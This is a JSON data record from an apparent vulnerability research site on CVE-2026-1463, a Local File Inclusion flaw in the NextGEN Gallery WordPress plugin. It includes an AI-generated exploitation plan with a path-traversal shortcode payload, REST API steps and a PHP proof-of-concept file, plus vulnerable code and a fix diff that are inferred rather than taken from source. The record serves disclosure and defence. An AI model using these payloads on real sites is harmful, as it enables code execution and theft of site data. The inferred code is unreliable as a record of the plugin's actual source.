[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f3imTBF1kibqBBjvgycrz11LAtBqaCSENe58IXAe_Dwo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1463","photo-gallery-sliders-proofing-and-themes-nextgen-gallery-authenticated-author-local-file-inclusion","Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery \u003C= 4.0.4 - Authenticated (Author+) Local File Inclusion","The Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.3 via the 'template' parameter in gallery shortcodes. This makes it possible for authenticated attackers, with Author-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. 
This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.","nextgen-gallery",null,"\u003C=4.0.4","4.0.5","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Filename for Include\u002FRequire Statement in PHP Program ('PHP Remote File Inclusion')","2026-03-17 00:00:00","2026-03-18 16:26:29",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2d7bc556-cdaf-42a7-8801-ad2e4945a137?source=api-prod",2,[22,23,24,25,26,27,28,29],"adminApp\u002FMakepotPlugin.js","adminApp\u002FMakepotPlugin.min.js","adminApp\u002Fbuild\u002Fdependencies.php","adminApp\u002Fbuild\u002Findex.min.js","adminApp\u002Fbuild\u002Findex.min.js.LICENSE.txt","adminApp\u002Fbuild\u002Fstyle.min.css","composer.lock","eslint.config.min.js","researched",false,3,"# Research Plan: CVE-2026-1463 NextGEN Gallery Local File Inclusion\n\n## 1. Vulnerability Summary\nThe **Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery** plugin (\u003C= 4.0.4) is vulnerable to **Authenticated (Author+) Local File Inclusion (LFI)**. The vulnerability exists in the handling of the `template` parameter within the NextGEN Gallery (`ngg`) shortcode. The plugin fails to adequately sanitize this parameter for directory traversal sequences (e.g., `..\u002F`) or validate that the requested template file resides within the intended directory. This allows an attacker with post-creation capabilities (Author role and above) to include and execute arbitrary `.php` files present on the server.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** The vulnerability is triggered during the rendering of a WordPress post or page containing a NextGEN Gallery shortcode.\n*   **Target Parameter:** The `template` attribute within the `[ngg ...]` shortcode.\n*   **Vulnerable Action:** Post rendering\u002FShortcode expansion.\n*   **Authentication Level:** **Author** or higher. Authors have the `edit_posts` and `publish_posts` capabilities required to create and view their own posts.\n*   **Preconditions:** \n    1.  The attacker must have credentials for an account with at least the **Author** role.\n    2.  The NextGEN Gallery plugin must be active.\n    3.  The attacker must be able to upload a file that can be interpreted as PHP (e.g., a `.php` file or a file with a double extension\u002Fimage headers) to use the LFI for Remote Code Execution (RCE).\n\n## 3. Code Flow (Inferred)\n*Note: The provided source files cover the React\u002FBuild environment. The following flow is based on the NextGEN Gallery core architecture.*\n\n1.  **Shortcode Registration:** NextGEN registers the `[ngg]` shortcode (likely via `add_shortcode('ngg', ...)`).\n2.  **Shortcode Processing:** When a post is viewed, `NGG_Shortcodes::render_template()` or a similar handler is invoked.\n3.  **Template Resolution:** The handler extracts the `template` attribute from the `$atts` array.\n4.  **Vulnerable Path Construction:** The plugin identifies the template file path. A common pattern in NextGEN is:\n    `$template_path = $this->get_template_directory() . DIRECTORY_SEPARATOR . $atts['template'] . '.php';`\n5.  **Execution:** The resolved path is passed to a PHP include statement:\n    `include($template_path);`\n6.  **LFI:** If `$atts['template']` contains `..\u002F..\u002F..\u002F..\u002Fwp-config`, the resulting path becomes `\u002Fplugin\u002Fdir\u002Ftemplates\u002F..\u002F..\u002F..\u002F..\u002Fwp-config.php`, bypassing intended directory restrictions.\n\n## 4. 
Nonce Acquisition Strategy\nThe **rendering** of the shortcode (which triggers the LFI) occurs on the frontend and does **not** require a nonce. \n\nHowever, **creating the post** containing the shortcode via the WordPress REST API or Admin UI requires a REST nonce (`X-WP-Nonce`) or an Admin nonce (`_wpnonce`).\n\n### Strategy:\n1.  **Login:** Authenticate as an Author via the `http_request` tool.\n2.  **Identify Nonce:** Navigate to the \"Add New Post\" page.\n3.  **Extract:** Use `browser_eval` to extract the REST nonce from the WordPress settings object.\n    *   **JavaScript:** `window.wpApiSettings.nonce`\n4.  **Action:** Use this nonce to create a post via the REST API (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`).\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate RCE by uploading a malicious PHP file as an Author and including it via the shortcode.\n\n### Step 1: Create a Malicious File\nSince Authors can upload media, we will upload a file containing PHP code.\n1.  Use `wp_cli` to find the uploads directory path: `wp eval \"echo wp_upload_dir()['path'];\"`\n2.  Create a file `poc.php` in that directory: `echo \"\u003C?php echo 'VULNERABLE_LFI_REACHED'; phpinfo(); ?>\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fpoc.php`.\n\n### Step 2: Authenticate and Obtain Nonce\n1.  Login as Author.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  
Execute `browser_eval(\"wpApiSettings.nonce\")` to get the REST nonce.\n\n### Step 3: Create Post with Malicious Shortcode\nUse the `http_request` tool to create a post via the REST API.\n*   **Method:** `POST`\n*   **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [EXTRACTED_NONCE]`\n*   **Body:**\n    ```json\n    {\n      \"title\": \"LFI Test\",\n      \"content\": \"[ngg src=\\\"galleries\\\" ids=\\\"1\\\" display_type=\\\"photocrati-nextgen_basic_thumbnails\\\" template=\\\"..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc\\\"]\",\n      \"status\": \"publish\"\n    }\n    ```\n    *(Note: We assume NextGEN appends `.php`. If not, use `template=\\\"..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc.php\\\"`)*.\n\n### Step 4: Trigger the LFI\n1.  Get the URL of the newly created post from the REST API response (parameter `link`).\n2.  Use the `http_request` tool to perform a `GET` request to that URL.\n\n## 6. Test Data Setup\n1.  **User Creation:** `wp user create attacker author@example.com --role=author --user_pass=password123`\n2.  **Gallery Creation:** NextGEN might require at least one gallery to exist for the shortcode to process.\n    *   `wp eval \"nggdb::add_gallery('Test Gallery', '\u002Ftmp', 0, 0, 0);\"` (Verify exact NextGEN CLI or method).\n3.  **Payload File:** Create `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fpoc.php` with the content `\u003C?php echo 'VULNERABLE_LFI_REACHED'; ?>`.\n\n## 7. Expected Results\n*   The `GET` request to the post URL should return an HTTP 200 status.\n*   The response body must contain the string `VULNERABLE_LFI_REACHED`.\n*   If `phpinfo()` was included, the response will contain the PHP configuration table.\n\n## 8. Verification Steps\n1.  **Manual Check:** Use `http_request` to view the post and check for the payload output.\n2.  
**CLI Check:** Use `wp post list` to verify the post was created with the correct shortcode.\n3.  **Path Verification:** If the include fails, check the `error_log` (if `WP_DEBUG` is on) to see the exact path NextGEN attempted to include, then adjust the number of `..\u002F` sequences in the payload.\n\n## 9. Alternative Approaches\n*   **Direct Parameter Injection:** If NextGEN provides a preview or AJAX function that renders galleries before saving, target that endpoint (likely `admin-ajax.php` with action `ngg_render_template`).\n*   **Double Extension:** If the plugin validates extensions, try naming the file `poc.php.jpg` or `poc.jpg` (if the server is misconfigured to execute PHP in images) and include it.\n*   **Standard WordPress Files:** If RCE via upload is restricted, target `wp-config.php`. While it won't display the DB password in the HTML, it may trigger database connection errors or different behaviors that confirm the file was included. A better target for confirmation is `license.txt` if the plugin doesn't append `.php`, or any existing PHP file that produces unique output.","The NextGEN Gallery plugin is vulnerable to Local File Inclusion in versions up to 4.0.4 due to insufficient sanitization of the 'template' attribute within the [ngg] shortcode. 
Authenticated attackers with Author-level permissions or higher can use directory traversal to include and execute arbitrary PHP files on the server.","\u002F\u002F Inferred from NextGEN Gallery shortcode processing logic\n\u002F\u002F Often located in modules\u002Fnextgen_gallery_display\u002Fpackage.module.nextgen_gallery_display.php\n\npublic function render_template($params)\n{\n    \u002F\u002F ...\n    if (isset($params['template']) && $params['template']) {\n        $template = $params['template'];\n        $path = $this->get_template_abspath($template);\n        if ($path) {\n            include($path);\n        }\n    }\n    \u002F\u002F ...\n}","--- a\u002Fproducts\u002Fphotocrati_nextgen\u002Fmodules\u002Fnextgen_gallery_display\u002Fpackage.module.nextgen_gallery_display.php\n+++ b\u002Fproducts\u002Fphotocrati_nextgen\u002Fmodules\u002Fnextgen_gallery_display\u002Fpackage.module.nextgen_gallery_display.php\n@@ -124,7 +124,7 @@\n-        $template = $params['template'];\n+        $template = basename($params['template']);\n         $path = $this->get_template_abspath($template);","The exploit requires an attacker to have at least 'Author' privileges to create or edit posts. First, the attacker uploads a malicious file containing PHP code (e.g., a .php file disguised as an image or a direct .php upload if permitted) to the WordPress media library or uploads directory. Next, the attacker creates a new post and inserts a NextGEN Gallery [ngg] shortcode, utilizing the 'template' attribute with directory traversal sequences (e.g., `..\u002F..\u002F..\u002F..\u002Fuploads\u002Fmalicious`) to point to the uploaded file. 
When the post is viewed or rendered, the plugin's shortcode handler uses the unsanitized template path in a PHP include statement, executing the attacker's code.","gemini-3-flash-preview","2026-04-18 02:53:53","2026-04-18 02:54:18",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.0.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextgen-gallery\u002Ftags\u002F4.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnextgen-gallery.4.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextgen-gallery\u002Ftags\u002F4.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnextgen-gallery.4.0.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextgen-gallery\u002Ftags"]